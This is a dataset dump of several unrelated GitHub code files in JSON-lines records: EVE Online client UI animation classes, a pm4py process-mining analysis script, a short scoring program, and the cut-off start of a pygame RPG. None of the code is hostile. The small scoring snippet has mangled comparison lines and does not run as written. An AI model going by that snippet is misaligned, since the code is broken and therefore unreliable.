padRight=2, color=util.Color.WHITE)\n if self.hasCorners:\n self.cornerLeft = uicls.Sprite(parent=self, name='cornerLeft', texturePath='res:/UI/Texture/classes/CQMainScreen/cornerLeft.png', pos=(0, 0, 22, 22))\n self.cornerRight = uicls.Sprite(parent=self, name='cornerRight', texturePath='res:/UI/Texture/classes/CQMainScreen/cornerRight.png', pos=(0, 0, 22, 22), align=uiconst.TOPRIGHT)\n\n def _OnResize(self):\n if not hasattr(self, 'wedge'):\n return\n self.UpdatePosition()\n\n def UpdatePosition(self):\n w, h = self.GetAbsoluteSize()\n self.wedge.left = (w - self.wedge.width) * self.wedgePosRatio\n self.borderLeft.width = self.wedge.left\n self.borderRight.width = w - self.wedge.left - self.wedge.width\n\n def AnimAppear(self):\n if self.hasCorners:\n uicore.animations.FadeIn(self.cornerLeft, duration=TIME_BASE / 3, loops=3)\n uicore.animations.FadeIn(self.cornerRight, duration=TIME_BASE / 3, loops=3, sleep=True)\n uicore.animations.FadeIn(self.borderLeft, duration=TIME_BASE)\n uicore.animations.FadeIn(self.borderRight, duration=TIME_BASE)\n uicore.animations.FadeIn(self.wedge, duration=TIME_BASE / 3, loops=3, sleep=True)\n uicore.animations.MorphScalar(self.wedge, 'top', self.wedge.top, 0, duration=TIME_BASE, curveType=uiconst.ANIM_LINEAR, sleep=True)\n\n def AnimDisappear(self):\n uicore.animations.FadeOut(self)\n\n\nclass ScreenWedgeBracketBottom(ScreenWedgeBracketTop):\n __guid__ = 'uicls.ScreenWedgeBracketBottom'\n default_name = 'ScreenWedgeBracketBottom'\n default_align = uiconst.TOBOTTOM\n default_rotation = math.pi\n\n\nclass ScreenSimpleBracketTop(uicls.Frame):\n __guid__ = 'uicls.ScreenSimpleBracketTop'\n default_name = 'ScreenSimpleBracketTop'\n default_texturePath = 'res:/UI/Texture/classes/CQMainScreen/simpleBracketTop.png'\n default_cornerSize = 21\n default_align = uiconst.TOTOP\n default_height = 21\n default_color = util.Color.WHITE\n\n def AnimAppear(self):\n uicore.animations.FadeIn(self, duration=TIME_BASE)\n\n def AnimDisappear(self):\n uicore.animations.FadeOut(self, duration=TIME_BASE)\n\n\nclass ScreenSimpleBracketBottom(ScreenSimpleBracketTop):\n __guid__ = 'uicls.ScreenSimpleBracketBottom'\n default_name = 'ScreenSimpleBracketTop'\n default_texturePath = 'res:/UI/Texture/classes/CQMainScreen/simpleBracketBottom.png'\n default_align = uiconst.TOBOTTOM\n\n\nclass ScreenFrameBase(uicls.Container):\n __guid__ = 'uicls._ScreenFrameBase'\n\n def ApplyAttributes(self, attributes):\n uicls.Container.ApplyAttributes(self, attributes)\n self.bracketLayer = uicls.Container(name='bracketCont', parent=self)\n self.mainCont = uicls.Container(name='mainCont', parent=self)\n self.topBracket = None\n self.bottomBracket = None\n uthread.new(self.AnimAppear)\n\n def AnimAppear(self):\n w, h = self.GetAbsoluteSize()\n uicore.animations.MorphScalar(self.topBracket, 'padTop', h / 2, 0, duration=TIME_BASE)\n uicore.animations.MorphScalar(self.bottomBracket, 'padBottom', h / 2, 0, duration=TIME_BASE, sleep=True)\n for obj in self.bracketLayer.children:\n uthread.new(obj.AnimAppear)\n blue.pyos.synchro.SleepWallclock(200)\n\n blue.pyos.synchro.SleepWallclock(2000)\n for c in self.mainCont.children:\n if hasattr(c, 'AnimAppear'):\n uthread.new(c.AnimAppear)\n\n\nclass ScreenFrame1(ScreenFrameBase):\n __guid__ = 'uicls.ScreenFrame1'\n default_name = 'ScreenFrame1'\n\n def ApplyAttributes(self, attributes):\n uicls._ScreenFrameBase.ApplyAttributes(self, attributes)\n self.bottomBracket = uicls.ScreenWedgeBracketBottom(parent=self.bracketLayer, wedgePosRatio=0.3, rotation=math.pi, align=uiconst.TOBOTTOM)\n self.topBracket = uicls.ScreenWedgeBracketTop(parent=self.bracketLayer, wedgePosRatio=0.3, rotation=0)\n\n\nclass ScreenFrame2(ScreenFrameBase):\n __guid__ = 'uicls.ScreenFrame2'\n default_name = 'ScreenFrame2'\n\n def ApplyAttributes(self, attributes):\n ScreenFrameBase.ApplyAttributes(self, attributes)\n self.topBracket = uicls.ScreenWedgeBracketTop(parent=self.bracketLayer, wedgePosRatio=0.3, wedgeWidth=200, hasCorners=False)\n self.bottomBracket = uicls.ScreenSimpleBracketBottom(parent=self.bracketLayer)\n\n\nclass ScreenFrame3(ScreenFrameBase):\n __guid__ = 'uicls.ScreenFrame3'\n default_name = 'ScreenFrame3'\n\n def ApplyAttributes(self, attributes):\n ScreenFrameBase.ApplyAttributes(self, attributes)\n self.topBracket = uicls.ScreenSimpleBracketTop(parent=self.bracketLayer)\n self.bottomBracket = uicls.ScreenWedgeBracketBottom(parent=self.bracketLayer, wedgePosRatio=0.3, wedgeWidth=200, hasCorners=False)\n\n\nclass ScreenFrame4(ScreenFrameBase):\n __guid__ = 'uicls.ScreenFrame4'\n default_name = 'ScreenFrame4'\n\n def ApplyAttributes(self, attributes):\n ScreenFrameBase.ApplyAttributes(self, attributes)\n self.topBracket = uicls.ScreenSimpleBracketTop(parent=self.bracketLayer)\n self.bottomBracket = uicls.ScreenSimpleBracketBottom(parent=self.bracketLayer)\n\n\nclass ScreenFrame5(ScreenFrame1):\n __guid__ = 'uicls.ScreenFrame5'\n default_name = 'ScreenFrame5'\n\n def ApplyAttributes(self, attributes):\n ScreenFrame1.ApplyAttributes(self, attributes)\n ScreenBlinkingSquares(parent=self.bracketLayer, padLeft=50, padBottom=-5, padRight=15)\n\n\nclass ScreenHeading1(uicls.Container):\n __guid__ = 'uicls.ScreenHeading1'\n default_name = 'ScreenHeading1'\n default_align = uiconst.TOTOP\n default_fillColor = (0.180392157, 0.219607843, 0.239215686, 1.0)\n default_gradientColor = (0.152941176, 0.168627451, 0.17254902, 1.0)\n default_leftContWidth = 60\n default_height = 60\n\n def ApplyAttributes(self, attributes):\n uicls.Container.ApplyAttributes(self, attributes)\n fillColor = attributes.get('fillColor', self.default_fillColor)\n gradientColor = attributes.get('gradientColor', self.default_gradientColor)\n leftContWidth = attributes.get('leftContWidth', self.default_leftContWidth)\n appear = attributes.get('appear', False)\n self.leftCont = uicls.Container(name='leftCont', parent=self, align=uiconst.TOLEFT, width=leftContWidth)\n uicls.Fill(name='leftBg', bgParent=self.leftCont, color=fillColor)\n self.mainCont = uicls.Container(name='mainCont', parent=self, padLeft=0, padRight=0)\n gradient = uicls.Sprite(name='rightGradient', bgParent=self.mainCont, color=gradientColor, texturePath='res:/UI/Texture/classes/CQMainScreen/gradientHoriz.png')\n if appear:\n uthread.new(self.AnimAppear)\n else:\n self.opacity = 0.0\n\n def AnimAppear(self):\n TIME_BASE = 0.2\n w, h = self.GetAbsoluteSize()\n self.opacity = 1.0\n uicore.animations.MorphScalar(self.leftCont, 'displayWidth', 0, self.leftCont.width, duration=TIME_BASE)\n uicore.animations.FadeIn(self.leftCont, duration=TIME_BASE / 3, loops=3, sleep=True)\n uicore.animations.MorphScalar(self.mainCont, 'displayWidth', 0, w - self.leftCont.width, duration=TIME_BASE)\n uicore.animations.FadeIn(self.mainCont, duration=TIME_BASE / 3, loops=3, sleep=True)\n\n\nclass ScreenHeading2(uicls.Container):\n __guid__ = 'uicls.ScreenHeading2'\n default_name = 'ScreenHeading2'\n default_height = 60\n default_width = 600\n default_align = uiconst.TOPLEFT\n default_text = ''\n default_opacity = 0.0\n default_hasBargraph = True\n\n def ApplyAttributes(self, attributes):\n uicls.Container.ApplyAttributes(self, attributes)\n text = attributes.get('text', self.default_text)\n appear = attributes.get('appear', False)\n self.hasBargraph = attributes.get('hasBargraph', self.default_hasBargraph)\n rightCont = uicls.Container(name='rightCont', parent=self, align=uiconst.TORIGHT, width=446, padBottom=5)\n uicls.Sprite(name='rightGraphics', parent=rightCont, align=uiconst.TOBOTTOM, texturePath='res:/UI/Texture/classes/CQMainScreen/heading2.png', height=14)\n uicls.Fill(name='thickLine', parent=self, align=uiconst.TOBOTTOM, height=6, padBottom=9, color=util.Color.WHITE)\n self.label = uicls.Label(parent=self, text=text, top=10, fontsize=30, color=util.Color.WHITE)\n self.movingFill = uicls.Fill(name='movingFill', parent=self, align=uiconst.BOTTOMRIGHT, pos=(0, 0, 100, 3), color=util.Color.WHITE)\n if self.hasBargraph:\n barGraphCont = uicls.Container(name='bargraphCont', parent=self, align=uiconst.TOPRIGHT, pos=(10, 8, 332, 31))\n self.barGraph = uicls.Sprite(name='barGraph', parent=barGraphCont, texturePath='res:/UI/Texture/classes/CQMainScreen/barGraph.png', align=uiconst.CENTER, width=barGraphCont.width, height=31)\n self.barGraph.color.a = 0.6\n if appear:\n uthread.new(self.AnimAppear)\n\n def AnimAppear(self):\n TIME_BASE = 0.2\n uicore.animations.FadeIn(self, duration=TIME_BASE / 3, loops=3)\n uicore.animations.MorphScalar(self.movingFill, 'left', 0, 244, loops=uiconst.ANIM_REPEAT, curveType=uiconst.ANIM_WAVE, duration=2.0)\n if self.hasBargraph:\n uicore.animations.MorphScalar(self.barGraph, 'height', 0, 45, curveType=uiconst.ANIM_RANDOM, duration=1.0)\n\n\nclass ScreenHeading3(uicls.Container):\n __guid__ = 'uicls.ScreenHeading3'\n default_name = 'ScreenHeading3'\n default_height = 60\n default_width = 600\n default_align = uiconst.TOPLEFT\n default_text = ''\n default_opacity = 0.0\n\n def ApplyAttributes(self, attributes):\n uicls.Container.ApplyAttributes(self, attributes)\n text = attributes.get('text', self.default_text)\n appear = attributes.get('appear', False)\n self.label = uicls.EveLabelMedium(parent=self, align=uiconst.CENTER, fontsize=self.height - 25, text=text)\n uicls.Fill(bgParent=self, color=(0.5, 0.5, 0.5, 1.0))\n if appear:\n uthread.new(self.AnimAppear)\n\n def AnimAppear(self):\n uicore.animations.BlinkIn(self, sleep=True)\n uicore.animations.BlinkIn(self.label, sleep=True)\n uicore.animations.MorphScalar(self.label, 'opacity', startVal=1.0, endVal=0.5, curveType=uiconst.ANIM_WAVE, loops=uiconst.ANIM_REPEAT)\n\n\nclass ScreenBlinkingSquares(uicls.Container):\n __guid__ = 'uicls.ScreenBlinkingSquares'\n default_name = 'ScreenBlinkingSquares'\n default_height = 10\n default_align = uiconst.TOBOTTOM\n default_opacity = 0.0\n default_padBottom = 10\n default_padLeft = 10\n default_padRight = 10\n\n def ApplyAttributes(self, attributes):\n uicls.Container.ApplyAttributes(self, attributes)\n left1 = uicls.Fill(name='left1', parent=self, align=uiconst.TOLEFT, width=8, padBottom=5, color=util.Color.WHITE)\n left2 = uicls.Fill(name='left2', parent=self, align=uiconst.TOLEFT, width=30, padLeft=3, color=util.Color.WHITE)\n left3 = uicls.Fill(name='left3', parent=self, align=uiconst.TOLEFT, width=8, padLeft=3, color=util.Color.WHITE)\n self.label = uicls.EveLabelSmall(parent=self, align=uiconst.TOLEFT, width=100, padLeft=5)\n self.right1 = uicls.Fill(name='right1', parent=self, align=uiconst.TORIGHT, width=50, color=util.Color.WHITE)\n self.right2 = uicls.Fill(name='right2', parent=self, align=uiconst.TORIGHT, width=50, color=util.Color.WHITE, padRight=3)\n self.right3 = uicls.Fill(name='right3', parent=self, align=uiconst.TORIGHT, width=50, color=util.Color.WHITE, padRight=3)\n\n def AnimAppear(self):\n TIME_BASE = 0.2\n uicore.animations.FadeIn(self, duration=TIME_BASE / 3, loops=3)\n uthread.new(self.UpdateBitCounter)\n uthread.new(self.UpdateText)\n\n def UpdateText(self):\n x1 = 10000\n x2 = 30000\n msgList = ['59 4F 55 20',\n '48 41 56 45',\n '20 57 41 59',\n '20 54 4F 4F',\n '20 4D 55 43',\n '48 20 54 49',\n '4D 45 20 4F',\n '4E 20 59 4F',\n '55 52 20 48',\n '41 4E 44 53']\n while not self.destroyed:\n for msg in msgList:\n self.label.text = '%s' % msg\n uicore.animations.FadeIn(self.label, duration=TIME_BASE / 3, loops=3)\n blue.pyos.synchro.SleepWallclock(random.randint(1000, 2000))\n if self.label.destroyed:\n return\n\n def UpdateBitCounter(self):\n count = 0\n while not self.destroyed:\n val = max(0.2, count & 1)\n uicore.animations.FadeTo(self.right1, self.right1.opacity, val)\n val = max(0.2, count >> 1 & 1)\n uicore.animations.FadeTo(self.right2, self.right2.opacity, val)\n val = max(0.2, count >> 2 & 1)\n uicore.animations.FadeTo(self.right3, self.right3.opacity, val)\n count += 1\n if count == 8:\n count = 0\n blue.pyos.synchro.SleepWallclock(1000)\n\n\nclass AutoTextScroll(uicls.Container):\n __guid__ = 'uicls.AutoTextScroll'\n default_name = 'AutoScrollHorizontal'\n default_scrollSpeed = 10\n default_clipChildren = True\n default_textList = None\n default_fontSize = 30\n default_fadeColor = util.Color.BLACK\n default_fadeWidth = 100\n default_color = util.Color.WHITE\n\n def ApplyAttributes(self, attributes):\n uicls.Container.ApplyAttributes(self, attributes)\n textList = attributes.get('textList', self.default_textList)\n self.scrollSpeed = attributes.get('scrollSpeed', self.default_scrollSpeed)\n self.fontSize = attributes.get('fontSize', self.default_fontSize)\n fadeColor = attributes.get('fadeColor', self.default_fadeColor)\n fadeWidth = attributes.get('fadeWidth', self.default_fadeWidth)\n self.color = attributes.get('color', self.default_color)\n self.scrollThread = None\n if fadeColor:\n uicls.Sprite(name='leftFade', parent=self, texturePath='res:/UI/Texture/classes/CQMainScreen/autoTextGradientLeft.png', color=fadeColor, align=uiconst.TOLEFT, width=fadeWidth, state=uiconst.UI_DISABLED)\n uicls.Sprite(name='leftFade', parent=self, texturePath='res:/UI/Texture/classes/CQMainScreen/autoTextGradientRight.png', color=fadeColor, align=uiconst.TORIGHT, width=fadeWidth, state=uiconst.UI_DISABLED)\n self.textCont = uicls.Container(name='textCont', parent=self, align=uiconst.CENTERLEFT, height=self.fontSize)\n if textList:\n self.SetTextList(textList)\n\n def SetTextList(self, textList, funcList = None, funcKeywordsList = None):\n self.textCont.Flush()\n if self.scrollThread:\n self.scrollThread.kill()\n if not textList:\n return\n x = 0\n for i, text in enumerate(textList):\n if i != 0:\n bullet = uicls.Sprite(parent=self.textCont, align=uiconst.CENTERLEFT, texturePath='res:/UI/texture/classes/CQMainScreen/bullet.png', pos=(x,\n 0,\n 11,\n 11), color=self.color)\n bulletWidth = bullet.width + 10\n else:\n bulletWidth = 0\n if funcList:\n clickFunc = funcList[i]\n else:\n clickFunc = None\n if funcKeywordsList:\n funcKeywords = funcKeywordsList[i]\n else:\n funcKeywords = None\n labelCont = uicls._AutoTextLabelCont(parent=self.textCont, clickFunc=clickFunc, funcKeywords=funcKeywords, left=x + bulletWidth, align=uiconst.TOPLEFT)\n label = uicls.Label(parent=labelCont, text='%s' % text, fontsize=self.fontSize, color=self.color)\n labelCont.width = label.width\n labelCont.height = label.height\n x += label.width + 10 + bulletWidth\n\n self.textCont.width = x\n self.textCont.height = label.height\n self.scrollThread = uthread.new(self.ScrollThread)\n\n def ScrollThread(self):\n w, h = self.GetAbsoluteSize()\n self.textCont.left = w\n while not self.destroyed:\n duration = self.textCont.width / float(self.scrollSpeed)\n uicore.animations.MorphScalar(self.textCont, 'left', startVal=w, endVal=-self.textCont.width, duration=duration, curveType=uiconst.ANIM_LINEAR, sleep=True)\n\n\nclass LabelCont(uicls.Container):\n __guid__ = 'uicls._AutoTextLabelCont'\n default_state = uiconst.UI_NORMAL\n\n def ApplyAttributes(self, attributes):\n uicls.Container.ApplyAttributes(self, attributes)\n self.hoverFill = uicls.Fill(parent=self, color=(1.0, 1.0, 1.0, 0.0), padLeft=-5, padRight=-5)\n self.clickFunc = attributes.get('clickFunc', None)\n self.funcKeywords = attributes.get('funcKeywords', None)\n\n def OnMouseEnter(self, *args):\n if self.clickFunc:\n uicore.animations.FadeIn(self.hoverFill, endVal=0.5, duration=0.3)\n\n def OnMouseExit(self, *args):\n if self.clickFunc:\n uicore.animations.FadeOut(self.hoverFill)\n\n def OnClick(self, *args):\n if self.clickFunc:\n if self.funcKeywords:\n self.clickFunc(**self.funcKeywords)\n else:\n self.clickFunc()\n\n\nclass TextBanner(uicls.Container):\n __guid__ = 'uicls.TextBanner'\n default_height = 80\n default_align = uiconst.TOBOTTOM\n default_leftContWidth = 0\n default_scrollText = True\n default_fontSize = 30\n default_color = (0.15, 0.15, 0.15, 1.0)\n\n def ApplyAttributes(self, attributes):\n uicls.Container.ApplyAttributes(self, attributes)\n text = attributes.get('text', '')\n textList = attributes.get('textList', None)\n if textList is None:\n textList = [text]\n fontSize = attributes.get('fontSize', self.default_fontSize)\n leftContWidth = attributes.get('leftContWidth', self.default_leftContWidth)\n color = attributes.get('color', self.default_color)\n self.leftCont = uicls.Container(name='leftCont', parent=self, align=uiconst.TOLEFT, width=leftContWidth)\n autoText = uicls.AutoTextScroll(parent=self, align=uiconst.TOALL, scrollSpeed=70, fontSize=fontSize, textList=textList, fadeColor=color)\n uicls.Sprite(bgParent=self, texturePath='res:/UI/Texture/Classes/CQMainScreen/autoTextGradientLeft.png', color=color)","repo_name":"alexcmd/eve","sub_path":"eve-8.21.494548/eve/client/script/ui/station/captainsquarters/screenControls.py","file_name":"screenControls.py","file_ext":"py","file_size_in_byte":20219,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"}
+{"seq_id":"70435899293","text":"from numpy.core.fromnumeric import var\nfrom pm4py.objects.conversion.log import converter as log_converter\nfrom pm4py.algo.filtering.log.variants import variants_filter\nfrom pm4py.objects.log.util import interval_lifecycle\nfrom pm4py.algo.filtering.log.variants import variants_filter\nfrom math import sqrt\nfrom random import randint\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n## Point 2\n# Since the log files are in a different format, it is necessary to make them compatible with PM4PY before processing them\ndf_web_server = pd.read_csv(\"WEB_SERVER.log\", sep=' ', header=None)\ndf_web_server[5] = (df_web_server[5] + df_web_server[6]).str.strip(\"[]\")\ndf_web_server[5] = pd.to_datetime(df_web_server[5], format='%d/%b/%Y:%H:%M:%S%z')\ndf_web_server = df_web_server.drop(labels=[0, 2, 3, 6, 9, 11, 12], axis=1)\ndf_web_server = df_web_server.rename(columns={1: \"IP\", 4: \"ID\", 5: \"TIMESTAMP\", 7: \"REQUEST\", 8: \"CODE\", 10: \"URL\"})\n\n# print(df_web_server)\n\ndf_application_server = pd.read_csv(\"APPLICATION_SERVER.log\", sep=' ', header=None)\ndf_application_server[3] = (df_application_server[3] + df_application_server[4]).str.strip(\"[]\")\ndf_application_server[3] = pd.to_datetime(df_application_server[3], format='%d/%b/%Y:%H:%M:%S%z')\ndf_application_server = df_application_server.drop(labels=[1, 2, 4, 7], axis=1)\ndf_application_server = df_application_server.rename(columns={0: \"IP\", 3: \"TIMESTAMP\", 5: \"REQUEST\", 6: \"CODE\"})\n\n# print(df_application_server)\n\ndf_joined = df_web_server.join(df_application_server[\"TIMESTAMP\"], lsuffix=\"_WS\", rsuffix=\"_AS\")\ndf_joined[\"TIME_DELTA\"] = (df_joined[\"TIMESTAMP_AS\"] - df_joined[\"TIMESTAMP_WS\"]) / pd.Timedelta(seconds=1)\n\n# print(df_joined)\n\nmy_col = [x for x in range(50)]\ndf_database_server = pd.read_csv(\"DATABASE_SERVER.log\", sep=' ', header=None, names=my_col)\ndf_database_server = df_database_server.fillna('')\ndf_database_server[0] = df_database_server[0] + ':' + df_database_server[1] + \"+0200\"\ndf_database_server[0] = pd.to_datetime(df_database_server[0], format='%Y-%m-%d:%H:%M:%S.%f%z')\n\nfor i in range(6, 17):\n df_database_server[5] = df_database_server[5] + ' ' + df_database_server[i]\n\ndel_col = [1, 2, 6]\ndel_col.extend([n for n in range(7, 50)])\ndf_database_server = df_database_server.drop(labels=del_col, axis=1)\ndf_database_server = df_database_server.rename(columns={0: \"TIMESTAMP\", 3: \"ID\", 4: \"DATABASE\", 5: \"OPERATION\"})\ndf_database_server = df_database_server[df_database_server.DATABASE == \"postgres@infinity41_sp27p\"].reset_index()\n\n# print(df_database_server)\n\n## Point 3\nsize = len(df_database_server[\"TIMESTAMP\"])\ndb_delta_times = []\ndb_timestamps = []\nfor n in range(0, size, 15):\n try:\n last_op = df_database_server.at[n+15, 'TIMESTAMP']\n except:\n last_op = df_database_server.at[size-1, \"TIMESTAMP\"]\n first_op = df_database_server.at[n, \"TIMESTAMP\"]\n time_delta = (last_op - first_op) / pd.Timedelta(seconds=1)\n db_delta_times.append(time_delta)\n db_timestamps.append(first_op)\n\n\ndf_joined[\"TIME_DELTA_DB\"] = db_delta_times[:len(df_joined)]\ndf_joined[\"TIMESTAMP_DB\"] = db_timestamps[:len(df_joined)]\n\n# print(df_joined)\n\n#Point 4\nprint(df_joined.describe())\n\nplt.subplot(2, 1, 1)\nplt.plot(df_joined.index, df_joined[\"TIME_DELTA_DB\"])\nplt.title(\"Db time delta linechart\")\n\nplt.subplot(2, 1, 2)\nplt.scatter(df_joined.index, df_joined[\"TIME_DELTA_DB\"])\nplt.xlabel(\"Request number\")\nplt.ylabel(\"Time delta\")\nplt.title(\"Db time delta scatter chart\")\n\n# plt.show()\n\n# Remove outliers\ndf_joined_size = len(df_joined)\ndf_joined = df_joined[df_joined.TIME_DELTA_DB < 5]\nprint(\"\\nPercentage of overdue cases {0:.2g}%\\n\".format((df_joined_size - len(df_joined)) / size * 100))\n\nprint(df_joined.describe())\n\n## Point 5\ndf_joined[\"ID\"] = df_joined[\"ID\"].astype(str)\ndf_joined = df_joined.rename(columns={\"ID\": \"case:concept:name\", \"REQUEST\": \"concept:name\", \"TIMESTAMP_DB\": \"time:timestamp\"})\nparameters = {log_converter.Variants.TO_EVENT_LOG.value.Parameters.CASE_ID_KEY: 'case:concept:name'}\nevent_log = log_converter.apply(df_joined, parameters=parameters, variant=log_converter.Variants.TO_EVENT_LOG)\n\n# print(event_log)\n\nevent_log = interval_lifecycle.assign_lead_cycle_time(event_log)\n\n# print(\"\\nPercentile below the safe performance score 3 sec {}%\".format(count / ))\n\nvariants = variants_filter.get_variants(event_log)\n\n# print(variants)\n\nprint('\\nEvents: {} - Cases: {} - Variants: {}'.format(df_joined_size, len(event_log), len(variants)))\n\ndef performance_analysis(variants):\n variants_scores = {}\n count = 0\n for key, value in variants.items():\n variants_scores[key] = 0\n for event in value[0]:\n variants_scores[key] += event[\"TIME_DELTA_DB\"]\n \n performance_drop_variant = max(variants_scores, key=variants_scores.get)\n\n performance_drop_value = variants_scores[performance_drop_variant]\n\n print(\"\\n{0:.2g} is the most variant performance drop\".format(performance_drop_value))\n\n plt2 = plt.figure()\n ax1 = plt2.add_subplot(111)\n ax1.plot([x for x in range(len(variants_scores))], variants_scores.values())\n # plt.show()\n\n count = 0\n for value in variants_scores.values():\n if value < 3:\n count += 1\n\n print(\"\\nPercentile under 3 sec time delta db {:.2f}%\".format(count / len(variants_scores) * 100))\n\n # Remove the variant from the dictionary for the later comparison\n for key, value in variants_scores.items():\n if value == performance_drop_value:\n del variants_scores[key]\n break\n\n return {0: performance_drop_value, \"values\": list(variants_scores.values())}\n\nperformance_drop = performance_analysis(variants)\n\n#Filter most common variants\nfiltered_log = variants_filter.filter_log_variants_percentage(event_log, percentage=0.5)\n# print(len(filtered_log))\n\nvariants_filtered = variants_filter.get_variants(filtered_log)\n# print(len(variants_filtered))\n\nperformance_analysis(variants_filtered)\nprint()\n\n## Point 6\nfor n in range(50):\n i = randint(0, len(performance_drop[\"values\"])-1)\n z = (performance_drop[0] - performance_drop[\"values\"][i])/sqrt(performance_drop[0] + performance_drop[\"values\"][i])\n if z > 1.96:\n print(\"Comparing most performance drop variant with variant number {} differences are significantly important\".format(i+1))\n\n## Point 7\n# from pm4py.algo.discovery.dfg import algorithm as dfg_discovery\n# dfg = dfg_discovery.apply(event_log)\n\n# from pm4py.visualization.dfg import visualizer as dfg_visualization\n# dfg = dfg_discovery.apply(event_log, variant=dfg_discovery.Variants.PERFORMANCE)\n# parameters = {dfg_visualization.Variants.PERFORMANCE.value.Parameters.FORMAT: \"png\"}\n# gviz = dfg_visualization.apply(dfg, log=event_log, variant=dfg_visualization.Variants.PERFORMANCE, parameters=parameters)\n# dfg_visualization.save(gviz, \"dfg.png\")","repo_name":"Davydhh/Zucchetti-Process-Mining","sub_path":"solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":6826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"3114482687","text":"n=int(input())\r\nscore_c = score_s = 100\r\n\r\nfor _ in range(n):\r\n c,s= map(int, input().split(' '))\r\n if cs:\r\n score_s-=c\r\n else: continue\r\n \r\n\r\nprint(score_c)\r\nprint(score_s)\r\n","repo_name":"uranusneo/2021PS","sub_path":"10103.py","file_name":"10103.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"69805922333","text":"import pygame\nimport time\nimport sys\nimport json\nimport os\nimport re\nimport random\nBLACK = 0, 0, 0\nWHITE = 255, 255, 255\nRED = 255, 0, 0\nGREY = 128, 128, 128\nCREAM = 230, 230, 230\nYELLOW = 255, 255, 0\nsize = width, height = 1100, 800 # size of the window\nfps = 300 # frames per second for game\npath = os.getcwd()\nfiles = os.listdir(path)\n\npygame.init()\nscreen = pygame.display.set_mode(size)\nfclock = pygame.time.Clock()\n\nfont = pygame.font.Font(\"ShenYunSuXinTi-2.ttf\", 32)\nfont_small = pygame.font.Font(\"ShenYunSuXinTi-2.ttf\", 20)\nicon = pygame.image.load(\"./image/icon.png\")\npygame.display.set_icon(icon)\ncharacter_images = pygame.image.load(\"./image/角色.png\")\ncharacter_image = character_images.get_rect()\ncharacter_image = character_image.move(width - 60, height - 60)\nbag_images = pygame.image.load(\"./image/背包.png\")\nbag_image = bag_images.get_rect()\nbag_image = bag_image.move(width - 120, height - 60)\nachievement_images = pygame.image.load(\"./image/成就.png\")\nachievement_image = achievement_images.get_rect()\nachievement_image = achievement_image.move(width - 180, height - 60)\nstrengthen_images = pygame.image.load(\"./image/强化.png\")\nstrengthen_image = strengthen_images.get_rect()\nstrengthen_image = strengthen_image.move(width / 2 - 90, 100)\nsale_images = pygame.image.load(\"./image/出售.png\")\nsale_image = sale_images.get_rect()\nsale_image = sale_image.move((width - 200) / 3 - 140, 100)\nenchant_images = pygame.image.load(\"./image/附魔.png\")\nenchant_image = enchant_images.get_rect()\nenchant_image = enchant_image.move((width - 200) / 1.5 + 160, 100)\nshoe_images = pygame.image.load(\"./image/鞋子.png\")\nsword_images = pygame.image.load(\"./image/剑.png\")\nhelmet_images = pygame.image.load(\"./image/头盔.png\")\nring_images = pygame.image.load(\"./image/戒指.png\")\narmor_images = pygame.image.load(\"./image/护甲.png\")\nwand_images = pygame.image.load(\"./image/法杖.png\")\nbow_images = pygame.image.load(\"./image/弓箭.png\")\ntitle_images = pygame.image.load(\"./image/称号.png\")\nbig_health_images = pygame.image.load(\"./image/大红药.png\")\nsmall_health_images = pygame.image.load(\"./image/小红药.png\")\nbig_magic_images = pygame.image.load(\"./image/大蓝药.png\")\nsmall_magic_images = pygame.image.load(\"./image/小蓝药.png\")\nbig_attack_images = pygame.image.load(\"./image/攻击药剂(大).png\")\nsmall_attack_images = pygame.image.load(\"./image/攻击药剂(小).png\")\nenchant_material_images = pygame.image.load(\"./image/附魔材料.png\")\nvocational_material_images = pygame.image.load(\"./image/职业材料.png\")\nmission_material_images = pygame.image.load(\"./image/任务材料.png\")\npygame.display.set_caption(\"无名之地\")\n\n\nclass Material:\n def __init__(self, name):\n self.name = name\n\n def create_new_material(self, attack, defence, health, magic, critical, speed, luck, num, value, type):\n self.attack = attack\n self.defence = defence\n self.health = health\n self.magic = magic\n self.critical = critical\n self.speed = speed\n self.luck = luck\n self.num = num\n self.value = value\n self.type = type\n\n\nclass Baggage:\n def __init__(self, capacity):\n self.capacity = capacity\n self.objects = []\n self.amount = 0\n\n\nclass Prop:\n def __init__(self, name):\n self.name = name\n\n def create_new_prop(self, attack, defence, health, magic, critical, speed, luck, grow_attack, grow_defence,\n grow_health, grow_magic, grow_critical, grow_speed, grow_luck, value, pos, level=1,\n exp=0, need_exp=10, enchant_time=5, is_wear=0, numb=1):\n \"\"\"numb 表示此装备的序列号\"\"\"\n \"\"\"-1 = 法杖, 1 = 剑, 0 = 弓箭, 2 = helmet, 3 = armor, 4 = shoes, 5 = ornament, 6 = title\"\"\"\n # is_wear = 0,1,2,3 0 for not wearing, 1,2,3 for character 1, 2, 3\n self.level = level\n self.exp = exp\n self.need_exp = need_exp\n self.pos = pos\n self.enchant_time = enchant_time # 剩余的附魔次数\n self.grow_attack = grow_attack\n self.grow_defence = grow_defence\n self.grow_health = grow_health\n self.grow_magic = grow_magic\n self.grow_critical = grow_critical\n self.grow_speed = grow_speed\n self.grow_luck = grow_luck\n self.attack = attack\n self.defence = defence\n self.health = health\n self.magic = magic\n self.critical = critical\n self.speed = speed\n self.luck = luck\n self.is_wear = is_wear\n self.value = value\n self.numb = numb\n\n def up_level(self, exp):\n self.exp += exp\n while self.exp >= self.need_exp:\n self.value += self.need_exp//2\n self.level += 1\n self.exp = self.exp - self.need_exp\n self.need_exp *= 2\n self.attack += self.grow_attack\n self.defence += self.grow_defence\n self.health += self.grow_health\n self.magic += self.grow_magic\n self.critical += self.grow_critical\n self.speed += self.grow_speed\n self.luck += self.grow_luck\n\n\nclass Drug:\n def __init__(self, name):\n self.name = name\n\n def create_new_drug(self, attack, defence, health, speed, magic, num, value):\n self.num = num\n self.attack = attack\n self.defence = defence\n self.health = health\n self.speed = speed\n self.magic = magic\n self.value = value\n\n\nclass Character:\n def __init__(self, name):\n self.name = name\n\n def create_new_character(self, attack, defence, health, magic, critical, speed, luck, insight, grow_attack,\n grow_defence, grow_health, grow_magic, grow_critical, grow_speed, grow_luck, grow_insight,\n level=1, exp=0, need_exp=10, position=[]):\n self.level = level\n self.exp = 